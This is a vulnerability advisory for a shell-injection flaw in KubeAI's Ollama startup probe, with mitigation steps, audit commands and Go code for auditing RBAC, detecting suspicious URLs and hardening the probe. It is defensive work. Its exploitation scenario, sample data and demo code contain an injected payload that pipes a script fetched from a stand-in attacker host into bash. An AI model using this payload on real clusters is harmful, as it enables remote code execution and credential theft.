CVE-2026-34940: KubeAI: RCE via shell injection in Ollama startup probe

UNKNOWN
Published April 6, 2026
CISO Take

KubeAI's ollamaStartupProbeScript() function builds a bash command with fmt.Sprintf from unsanitized model URL components (ref, modelParam), an OS command injection (CWE-78) that Kubernetes then executes as a startup probe inside the model server pod. Any principal with RBAC permission to create or modify Model custom resources can run arbitrary commands in your LLM inference pods and from there reach model weights, API credentials mounted into the pod, and the internal cluster network. No public exploit exists and the CVE is not listed in CISA KEV, but this is a straightforward command injection that takes minimal skill once write access to Model resources is obtained. Upgrade to KubeAI 0.23.2 immediately; as an interim mitigation, restrict the create/update/patch verbs on the Model custom resource to trusted operators only.

Sources: NVD GitHub Advisory ATLAS

Risk Assessment

Effective risk is HIGH despite the absent CVSS score. CWE-78 command injection executed via bash -c inside a Kubernetes pod is critical whenever it is reachable. The attack surface is gated behind Kubernetes RBAC on Model custom resources, which limits external exposure but does nothing against insiders or an attacker who has already obtained cluster credentials. In multi-tenant clusters, with over-permissive CI/CD service accounts, or wherever users can submit model definitions, exploitation is trivial. Code execution inside model serving pods directly threatens the confidentiality of the inference infrastructure: model weights, mounted credentials and whatever the pod's service account can reach. Any automated pipeline that turns external model URLs into Model resources widens the blast radius considerably.

Severity & Risk

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Moderate

Recommended Action

  1. PATCH: Upgrade KubeAI to 0.23.2 — the fix sanitizes model URL components before shell command construction.
  2. RBAC AUDIT: Restrict Kubernetes RBAC on Model custom resources (resource models in API group kubeai.org) immediately: deny create/update/patch to all principals except trusted operators. The resource name lives in Roles and ClusterRoles, not in bindings, so grepping the bindings will not find it. List the roles that can write Models with: kubectl get clusterroles,roles -A -o json | jq -r '.items[] | select(any(.rules[]?; (.resources|index("models") or index("*")) and (.verbs|index("create") or index("update") or index("patch") or index("*")))) | "\(.kind)/\(.metadata.name)"' then review who is bound to them, and spot-check individual principals with kubectl auth can-i create models.kubeai.org --as=system:serviceaccount:<namespace>:<serviceaccount>.
  3. REVIEW: Audit existing Model resources for injected shell syntax. The ref and modelParam values are parsed out of the model URL, so inspect the URL field of each Model spec rather than grepping for those field names: kubectl get models.kubeai.org -A -o jsonpath='{range .items[*]}{.metadata.namespace}/{.metadata.name}{"\t"}{.spec.url}{"\n"}{end}' and flag any URL containing ;, |, &, $, backticks, parentheses, quotes or whitespace.
  4. DETECT: Monitor model server pods for unexpected child processes of the startup probe's bash (curl, wget, sh and python are the usual tells) using Falco or a similar runtime security tool.
  5. HARDEN: Apply Pod Security Standards (restricted profile) and NetworkPolicies to model serving namespaces to limit blast radius if exploitation occurs.
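Steps 2 and 3 above as one runnable audit, written here as an added example rather than KubeAI tooling. It decodes the JSON shape that kubectl get clusterroles,clusterrolebindings,models -o json produces, flags every subject bound to a role that can create, update or patch models in the kubeai.org API group (wildcards included), and scans each Model's URL for shell metacharacters. The sample roles, bindings and Model objects are constructed inline; that the Model's URL lives at spec.url is an assumption about the KubeAI CRD.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
)

// rule and object are minimal views of the JSON "kubectl get ... -o json"
// returns; fields the audit does not need are ignored by encoding/json.
type rule struct {
	APIGroups []string `json:"apiGroups"`
	Resources []string `json:"resources"`
	Verbs     []string `json:"verbs"`
}

type object struct {
	Kind     string                                  `json:"kind"`
	Metadata struct{ Name, Namespace string }        `json:"metadata"`
	Rules    []rule                                  `json:"rules"`
	RoleRef  struct{ Kind, Name string }              `json:"roleRef"`
	Subjects []struct{ Kind, Name, Namespace string } `json:"subjects"`
	Spec     struct{ URL string }                     `json:"spec"` // spec.url assumed to hold the model URL
}

// parseList decodes a kubectl List ({"items":[...]}).
func parseList(raw string) ([]object, error) {
	var l struct{ Items []object }
	err := json.Unmarshal([]byte(raw), &l)
	return l.Items, err
}

// has reports whether vals names want, directly or via the "*" wildcard.
func has(vals []string, want string) bool {
	for _, v := range vals {
		if v == want || v == "*" {
			return true
		}
	}
	return false
}

// grantsModelWrite: can the holder create, update or patch kubeai.org models?
func grantsModelWrite(rules []rule) bool {
	for _, r := range rules {
		if has(r.APIGroups, "kubeai.org") && has(r.Resources, "models") &&
			(has(r.Verbs, "create") || has(r.Verbs, "update") || has(r.Verbs, "patch")) {
			return true
		}
	}
	return false
}

// auditBindings lists every subject bound to a role that can write Models.
func auditBindings(roles, bindings []object) []string {
	writers := map[string]bool{}
	for _, r := range roles {
		if grantsModelWrite(r.Rules) {
			writers[r.Kind+"/"+r.Metadata.Name] = true
		}
	}
	var out []string
	for _, b := range bindings {
		if !writers[b.RoleRef.Kind+"/"+b.RoleRef.Name] {
			continue
		}
		for _, s := range b.Subjects {
			out = append(out, fmt.Sprintf("%s %s/%s -> %s", s.Kind, s.Namespace, s.Name, b.RoleRef.Name))
		}
	}
	return out
}

// shellMeta matches characters that change how bash parses a word; "&" also
// occurs in legitimate query strings, so expect a few hits to review by hand.
var shellMeta = regexp.MustCompile("[;|&$`(){}<>'\"\\\\ \n]")

// suspiciousModels returns namespace/name of Models whose URL carries shell syntax.
func suspiciousModels(models []object) []string {
	var out []string
	for _, m := range models {
		if shellMeta.MatchString(m.Spec.URL) {
			out = append(out, m.Metadata.Namespace+"/"+m.Metadata.Name)
		}
	}
	return out
}

// Constructed sample output in the shape kubectl produces (not from a real cluster).
const sampleRoles = `{"items":[
{"kind":"ClusterRole","metadata":{"name":"kubeai-model-editor"},"rules":[{"apiGroups":["kubeai.org"],"resources":["models"],"verbs":["get","create","update","patch"]}]},
{"kind":"ClusterRole","metadata":{"name":"kubeai-model-viewer"},"rules":[{"apiGroups":["kubeai.org"],"resources":["models"],"verbs":["get","list","watch"]}]}]}`
const sampleBindings = `{"items":[
{"kind":"ClusterRoleBinding","metadata":{"name":"ci-edits-models"},"roleRef":{"kind":"ClusterRole","name":"kubeai-model-editor"},"subjects":[{"kind":"ServiceAccount","name":"ci-deployer","namespace":"ci"}]},
{"kind":"ClusterRoleBinding","metadata":{"name":"all-read-models"},"roleRef":{"kind":"ClusterRole","name":"kubeai-model-viewer"},"subjects":[{"kind":"Group","name":"system:authenticated"}]}]}`
const sampleModels = `{"items":[
{"kind":"Model","metadata":{"name":"llama3","namespace":"ml-serving"},"spec":{"url":"ollama://llama3:8b"}},
{"kind":"Model","metadata":{"name":"injected","namespace":"ml-serving"},"spec":{"url":"ollama://llama3; curl http://attacker.com/implant.sh | bash; echo "}}]}`

func main() {
	roles, _ := parseList(sampleRoles)
	bindings, _ := parseList(sampleBindings)
	models, _ := parseList(sampleModels)
	fmt.Println("can write Models:", auditBindings(roles, bindings))
	fmt.Println("shell syntax in spec.url:", suspiciousModels(models))
}
```

On a live cluster, feed the output of kubectl get clusterroles,roles -A -o json, the matching bindings, and kubectl get models.kubeai.org -A -o json into parseList in place of the constants; namespaced Roles are keyed by kind and name here, so add the namespace to the key if you mix several namespaces in one run.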

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Article 9 - Risk management system
ISO 42001: A.9.1 - Security of AI systems
NIST AI RMF: MANAGE 2.2 - Risks associated with AI system components
OWASP LLM Top 10: LLM06:2025 - Excessive Agency

Technical Details

NVD Description

KubeAI is an AI inference operator for Kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vulnerability is fixed in 0.23.2.

Exploitation Scenario

An attacker holding Kubernetes credentials that allow Model CRD updates — obtained via a compromised CI/CD service account, misconfigured RBAC, or insider access — crafts a Model resource with a malicious modelParam field such as 'llama3; curl http://attacker.com/implant.sh | bash; echo '. When KubeAI's controller processes this resource, ollamaStartupProbeScript() interpolates the unsanitized value into a bash -c command that Kubernetes executes as the pod startup probe. The injected commands run inside the model server container with the pod's service account privileges, enabling the attacker to exfiltrate Hugging Face tokens, cloud provider credentials, or model artifacts, pivot to other cluster services via the internal network, or establish persistence inside the inference infrastructure for long-term access.
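The injection mechanics from the NVD description and the scenario above, as an added Go example that is not KubeAI's code: vulnerableProbeScript reconstructs the fmt.Sprintf pattern the advisory describes (the real command KubeAI builds is not given, so "ollama pull" is assumed), and hardenedProbeScript shows the two controls a fix needs, an allowlist on ref and modelParam and single-quoting of anything that still reaches the shell. The allowlist pattern is an assumption about what legitimate Ollama refs and parameters look like.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// vulnerableProbeScript reconstructs the pattern the advisory describes:
// model URL components interpolated with fmt.Sprintf into a script that is
// later handed to "bash -c". The advisory does not give the real command
// KubeAI builds, so "ollama pull" is an assumption for illustration only.
func vulnerableProbeScript(ref, modelParam string) string {
	return fmt.Sprintf("ollama pull %s %s", ref, modelParam)
}

// safeComponent allowlists Ollama-style refs ("llama3:8b", "library/llama3")
// and key=value parameters (assumed legitimate shapes). Every shell
// metacharacter, whitespace included, falls outside it.
var safeComponent = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._:/=-]*$`)

// validateComponent rejects a value that could change how bash parses the
// probe script; an empty value is allowed so optional params still work.
func validateComponent(field, v string) error {
	if v != "" && !safeComponent.MatchString(v) {
		return fmt.Errorf("%s %q contains characters outside the allowlist", field, v)
	}
	return nil
}

// shellQuote single-quotes v so bash sees one literal word. An embedded
// single quote is closed, escaped and reopened: a'b -> 'a'\''b'.
func shellQuote(v string) string {
	return "'" + strings.ReplaceAll(v, "'", `'\''`) + "'"
}

// hardenedProbeScript validates first and quotes second: two independent
// controls, so a gap in either one does not reintroduce CWE-78.
func hardenedProbeScript(ref, modelParam string) (string, error) {
	if ref == "" {
		return "", errors.New("ref must not be empty")
	}
	if err := validateComponent("ref", ref); err != nil {
		return "", err
	}
	if err := validateComponent("modelParam", modelParam); err != nil {
		return "", err
	}
	script := "ollama pull " + shellQuote(ref)
	if modelParam != "" {
		script += " " + shellQuote(modelParam)
	}
	return script, nil
}

// injected is the modelParam payload from the exploitation scenario.
const injected = "llama3; curl http://attacker.com/implant.sh | bash; echo "

func main() {
	// bash -c receives three commands instead of one.
	fmt.Println("vulnerable:", vulnerableProbeScript("llama3:8b", injected))
	if _, err := hardenedProbeScript("llama3:8b", injected); err != nil {
		fmt.Println("hardened rejected:", err)
	}
	s, _ := hardenedProbeScript("library/llama3:8b", "num_ctx=4096")
	fmt.Println("hardened:", s)
}
```

Quoting alone would already stop this payload, but a reconciler that builds shell from a CRD should fail closed on unexpected characters rather than rely on one escaping routine being applied at every call site.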

Weaknesses (CWE)

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Timeline

Published: April 6, 2026
Last Modified: April 6, 2026
First Seen: April 6, 2026

Related Vulnerabilities